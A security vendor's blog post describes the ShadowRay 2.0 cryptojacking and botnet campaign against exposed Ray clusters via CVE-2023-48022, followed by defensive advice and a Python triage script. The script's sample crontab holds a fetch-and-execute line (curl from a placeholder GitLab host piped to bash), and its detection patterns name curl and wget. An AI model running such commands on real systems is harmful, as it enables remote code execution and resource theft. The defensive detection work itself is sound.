A critical security campaign called ShadowRay 2.0 is turning exposed AI infrastructure into a crypto-mining nightmare. Attackers are exploiting a long-known but persistently unpatched vulnerability in the open-source Ray framework, weaponizing AI clusters, especially those with NVIDIA GPUs, for self-replicating cryptojacking and broader malicious activity.
What Is ShadowRay 2.0
- The root issue is CVE-2023-48022, a high-severity bug (CVSS 9.8) in Ray that allows unauthenticated remote code execution through its Job Submission API.
- This campaign, tracked by Oligo Security, abuses misconfigured Ray dashboards and job APIs alongside that vulnerability to hijack clusters.
- Once inside, attackers submit malicious jobs written in Bash or Python. These payloads can do reconnaissance, maintain persistence, and even spread to other vulnerable Ray clusters.
- The attackers are not just running miners. They have turned Ray’s orchestration into a self-propagating botnet, using its native scheduling to spread laterally.
How the Botnet Works
- Cryptomining: Compromised clusters run XMRig to mine cryptocurrency, quietly stealing GPU cycles.
- Stealth Mode: To stay under the radar, the malware limits CPU usage (around 60 percent) and disguises miner processes as legitimate Linux services.
- Persistence: The code sets up cron jobs that re-pull malicious payloads every 15 minutes from attacker-controlled repositories (initially on GitLab, later on GitHub).
- Resource Competition: The malware even hunts down other cryptominers on the same host, killing them to maximize its own profit.
- Lateral Spread: The worm-like nature of the campaign means that compromised clusters are used to find and infect more Ray instances.
- DDoS Capability: In some cases, compromised clusters are repurposed to run denial-of-service attacks using tools like sockstress, suggesting a monetization model beyond just cryptomining.
Why This Is a Critical Threat
- Exposed Attack Surface: According to Oligo, more than 230,000 Ray servers are publicly reachable, making the scale of the risk enormous.
- Design Trade-Off: Ray developers originally designed the framework to run in trusted, private networks, not exposed to the internet. That assumption is being abused.
- AI Resource Theft: High-performance GPU clusters, often rented at great cost, are being hijacked. These are precisely the systems AI firms and research labs depend on.
- Supply-Chain Risk: Attackers use publicly available DevOps infrastructure (GitLab and GitHub) to host and deploy their malware, making take-down efforts difficult.
- Evasion Strategy: By masking the malicious tasks and using orchestration features, the attackers avoid detection and create resilient, self-updating operations.
Recommended Defenses
To protect AI workloads and Ray-based clusters, security and IT teams should:
- Audit your Ray deployments and ensure no dashboards or job APIs are exposed to the internet.
- Use firewall rules to restrict access to Ray’s dashboard port (default 8265) from untrusted networks.
- Add authentication or an authorization layer on the Ray dashboard to prevent unauthenticated job submissions.
- Use Anyscale’s Ray Open Ports Checker to validate that your configuration aligns with security best practices.
- Monitor for abnormal job submissions, unusual cron jobs, or processes that mimic kernel services.
- Periodically scan nodes for cryptomining software (such as XMRig) or other indicators of compromise.
- Consider isolating Ray clusters in private networks whenever possible, limiting blast radius if a breach does occur.
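The monitoring items in the list above (unusual cron jobs, processes that mimic kernel services) can be triaged with a short script. This is an added example, not code from Oligo, Ray or COE Security; the function names are hypothetical, the sample crontab lines and process records are constructed, and it assumes each process record was already collected from /proc (name, parent PID, exe link).

```python
import re

FETCH_RE = re.compile(r"\b(curl|wget)\b")
EXEC_RE = re.compile(r"\|\s*(sudo\s+)?((ba|da|z)?sh|python[0-9.]*)\b")
HOSTING_RE = re.compile(r"https?://[^\s/]*(gitlab|github)", re.I)
KTHREAD_RE = re.compile(r"^(kthreadd|kworker|ksoftirqd|kswapd|migration|rcu_)")

def suspicious_cron(lines):
    """Return (entry, reasons) for cron entries that download code and run it."""
    hits = []
    for line in (l.strip() for l in lines):
        fields = line.split(None, 5)  # 5 schedule fields, then the command
        if line.startswith("#") or len(fields) < 6:
            continue
        minute, command = fields[0], fields[5]
        if not (FETCH_RE.search(command) and EXEC_RE.search(command)):
            continue
        reasons = ["fetch-and-execute"]
        if minute == "*/15":  # the re-pull interval described in this article
            reasons.append("15-minute interval")
        if HOSTING_RE.search(command):
            reasons.append("code-hosting URL")
        hits.append((line, reasons))
    return hits

def fake_kernel_threads(procs):
    """Return PIDs named like kernel threads that fail the lineage check:
    genuine ones are kthreadd (PID 2) or its children with an empty
    /proc/<pid>/exe link."""
    flagged = []
    for p in procs:
        genuine = p["pid"] == 2 or (p["ppid"] == 2 and not p["exe"])
        if KTHREAD_RE.match(p["comm"]) and not genuine:
            flagged.append(p["pid"])
    return flagged

# Constructed sample data (placeholders, not taken from a real incident).
SAMPLE_CRON = [
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
    "*/15 * * * * curl -fsSL https://gitlab.example.invalid/placeholder/run.sh | bash",
    "*/15 * * * * /opt/ray/healthcheck.sh",
]
SAMPLE_PROCS = [
    {"pid": 2, "ppid": 0, "comm": "kthreadd", "exe": ""},
    {"pid": 37, "ppid": 2, "comm": "kworker/0:1", "exe": ""},
    {"pid": 4121, "ppid": 1, "comm": "kworker/0:2", "exe": "/tmp/placeholder"},
    {"pid": 900, "ppid": 1, "comm": "raylet", "exe": "/usr/bin/raylet"},
]

if __name__ == "__main__":
    print(suspicious_cron(SAMPLE_CRON), fake_kernel_threads(SAMPLE_PROCS))
```

A scheduled job that only matches the 15-minute interval, such as the health check in the sample, is not flagged; the fetch-and-execute pattern is the required signal and the other reasons add context for the analyst.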
Conclusion
ShadowRay 2.0 marks a new chapter in cybercrime: using AI infrastructure to fuel cybercriminal botnets. The combination of unprotected orchestration APIs, exposed compute power, and stealthy malware strategies makes this a particularly dangerous campaign. As organizations scale up their AI operations, securing the underlying infrastructure must be a top priority, not just for performance but for foundational security.
About COE Security
At COE Security, we support forward-looking organizations in AI startups, research labs, cloud-native businesses, enterprise technology, and data-driven companies. We help by:
- Assessing and securing AI infrastructure and Ray clusters
- Designing hardened deployment practices with least-privilege access and network segmentation
- Building runtime monitoring and threat detection tailored to AI workloads
- Aligning security practices with compliance frameworks like ISO 27001, SOC 2, GDPR, HIPAA, and PCI DSS
- Offering incident response planning that includes emerging risks such as cryptojacking and worm-style propagation